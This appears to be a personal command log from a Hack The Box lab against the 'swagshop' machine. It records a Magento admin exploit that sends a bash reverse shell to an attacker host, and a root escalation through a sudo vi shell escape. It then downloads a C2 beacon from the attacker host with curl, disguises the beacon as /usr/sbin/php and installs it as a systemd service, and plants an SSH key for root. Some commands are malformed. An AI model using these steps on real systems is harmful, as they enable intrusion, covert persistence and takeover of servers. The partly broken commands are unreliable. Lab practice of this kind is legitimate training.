### setup

sudo apt install -y \
	nmap curl python3-venv make zip unzip \
	mtr

sudo openvpn --config htb.ovpn
2025-04-05T08:04:58-04:00

### T1 10.129.232.93

ping -c 1 10.129.232.93

python3 -m venv venv
source venv/bin/activate
python3 -m pip install mechanize
python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'"
2025-04-05T08:05:44-04:00


which curl
/usr/bin/curl

uname -a
Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.6 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.6 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
uid=0(root) gid=0(root) groups=0(root)

mkdir -f /tmp/.X1-lock/
curl -L -O g

 10.10.14.4

generate beacon  --http http://10.10.14.4:4444 --seconds 20 --os linux
http --lport 4444

curl -s -L http://10.10.14.4:8080/php -o /usr/sbin/php
chmod +x /tmp/.php
/tmp/.php
2025-04-05T08:25:45-04:00

root_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As=


mkdir /root/.ssh/
upload /home/user/swag/2025-04-05/root_rsa.pub /root/.ssh/authorized_keys
chmod /root/.ssh/authorized_keys 0400

cat /etc/ssh/sshd_config
#PermitRootLogin prohibit-password

ssh -vvv root@10.129.232.93 -T /bin/bash
2025-04-05T08:44:17-04:00

mv /tmp/.php /usr/sbin/php

php service

[Unit]
Description=php service
After=network.target
Type=simple
Restart=always
RestartSec=1
ExecStart=/usr/sbin/php

[Install]
WantedBy=multi-user.target

upload -o /home/user/swag/2025-04-05/out/php.service /lib/systemd/system/php.service
execute systemctl daemon-reload
execute systemctl enable php.service
execute systemctl start php.service

good service